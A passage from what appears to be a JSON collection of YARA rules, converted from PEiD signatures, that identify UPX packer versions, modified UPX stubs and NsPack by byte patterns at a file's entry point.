11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 }\r\n        $b = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_02_UPX_06: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_121_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 31 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 83 E8 48 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 F8 01 00 00 83 CD FF 31 DB EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Inliner_v10_by_GPcH_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_v01_500mhz_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5D 8B CD 81 ED 7A 29 40 00 89 AD 0F 6D 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_stub: PEiD\r\n{\r\n    strings:\r\n        $a = { 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 84 ?? 00 00 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 88 ?? 00 00 61 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modifier_v01x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }\r\n        $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v062: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 66 81 87 8D B0 EC 01 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2A 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 56 89 FE 29 C6 F3 A4 5E EB 9F 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 FF D3 11 C9 FF D3 72 F8 C3 31 C0 31 DB 31 C9 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F 0E 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 89 D8 E2 D9 8D BE ?? ?? ?? ?? 8B 07 09 C0 74 45 8B 5F 04 8D 84 30 ?? ?? ?? ?? 01 F3 50 83 C7 08 FF 96 ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 ?? ?? ?? ?? 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Modified_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Modified: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB 8A 07 EB B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 }\r\n        $b = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v051_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_dj_siba: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? 43 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 00 00 00 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_300_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n        $b = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_071_072_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 09 00 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Inliner_10_by_GPcH: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0991_0993_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE B0 00 00 00 8D BE 50 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n        $b = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXLock_v10_CyberDoom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_122_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 32 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306_OnToL: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_082_083_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { 81 FC 00 00 77 02 CD 20 B9 00 00 BE 00 00 BF 00 00 BB 00 80 FD F3 A4 FC 87 F7 83 EE C6 19 ED 57 57 E9 00 00 55 50 58 21 0A 01 04 07 00 00 00 00 00 00 00 00 00 00 00 00 06 00 FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule SkD_Undetectabler_Pro_20_No_UPX_Method_SkD_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V300_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_05_snaker: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 F9 00 7E 06 80 30 ?? 40 E2 F5 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_UPX_0896_102_105_124_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 64 A0 23 00 00 00 83 C5 06 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXShit_006: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? E2 FA E9 D6 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_070_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 08 00 02 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_V3042005_MANtiCORE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_v12_Marcus_Lazlo_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Password_Protector_for_the_UPX_030_g0d: PEiD\r\n{\r\n    strings:\r\n        $a = { C8 50 01 00 60 E8 EC 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 44 69 61 6C 6F 67 42 6F 78 49 6E 64 69 72 65 63 74 50 61 72 61 6D 41 00 53 65 6E 64 4D 65 73 73 61 67 65 41 00 45 6E 64 44 69 61 6C 6F 67 00 00 00 55 8B EC 57 BF 00 00 00 00 33 C0 81 6D 0C 10 01 00 00 75 03 40 EB 13 83 7D 0C 01 75 0D 66 83 7D 10 0B 75 0B FF 75 14 8F 47 E4 5F 5D C2 10 00 66 83 7D 10 02 77 F4 74 0E 8D 4F A0 51 6A 40 6A 0D FF 77 E4 FF 57 E8 50 FF 75 08 FF 57 EC EB DB 84 08 C8 90 00 00 00 00 01 00 64 00 64 00 64 00 14 00 00 00 00 00 45 00 6E 00 74 00 65 00 72 00 20 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64 00 00 00 A0 00 00 50 00 00 02 00 05 00 05 00 5A 00 0A 00 0B 00 FF FF 81 00 00 00 00 00 5E FC 8D BE AA FE FF FF 8D 86 }\r\n        $b = { C8 50 01 00 60 E8 EC 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 44 69 61 6C 6F 67 42 6F 78 49 6E 64 69 72 65 63 74 50 61 72 61 6D 41 00 53 65 6E 64 4D 65 73 73 61 67 65 41 00 45 6E 64 44 69 61 6C 6F }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_290_LZMA_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_wwwupxsourceforgenet: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? 00 8D BE ?? ?? ?? FF }\r\n        $b = { 60 BE ?? ?0 ?? 00 8D BE ?? ?? F? FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_030_040_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 BF C0 FF BD FF FF FD F3 A4 FC F7 E1 93 87 F7 83 C6 00 57 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_modifyer_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 02 00 00 00 CD 03 5A 81 C2 ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_020_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 BF C0 FF BD FF FF FD F3 A4 FC F7 E1 93 87 F7 83 C6 31 57 57 E9 3C FE 55 50 58 21 03 01 02 87 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_125_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 35 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_072: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_01_Borland_Delphi_HMX0101: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_Scrambler_vna: PEiD\r\n{\r\n    strings:\r\n        $a = { C7 45 FC ?? ?? ?? ?? 6A 04 6A 00 6A 00 68 FF FF FB FF FF 15 ?? ?? ?? ?? 85 C0 7E ?? 6A 00 FF 15 ?? ?? ?? ?? 8B 45 FC 8B 40 04 83 E8 03 8B 4D FC 89 41 04 83 65 F4 00 EB ?? 8B 45 F4 40 89 45 F4 8B 45 FC 8B 4D F4 3B 48 04 73 ?? 8B 45 FC 8B 40 04 2B 45 F4 8B 4D FC 8B 09 8B 55 FC 8B 44 01 FF 33 42 0C 8B 4D FC 8B 49 04 2B 4D F4 8B 55 FC 8B 12 89 44 11 FF EB ?? 8B 45 FC 8B 40 08 89 45 F8 8B 45 F8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_or_File_modifyer: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 02 00 00 00 CD 03 5A 81 C2 86 EA FE FF 81 C2 45 23 01 00 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_051_072_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 BF C0 FF FD F3 A4 FC F7 E1 93 87 F7 83 EE 00 19 ED 57 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 113,
            "key": "yara_detect_nspack",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_nspack",
            "rule": "rule NsPacK_V33_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 BD ?? ?? ?? ?? 01 AD 54 3A 40 ?? FF B5 50 3A 40 ?? 6A 40 FF 95 88 3A 40 ?? 50 50 2D ?? ?? ?? ?? 89 85 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_30_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V31_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 }\r\n    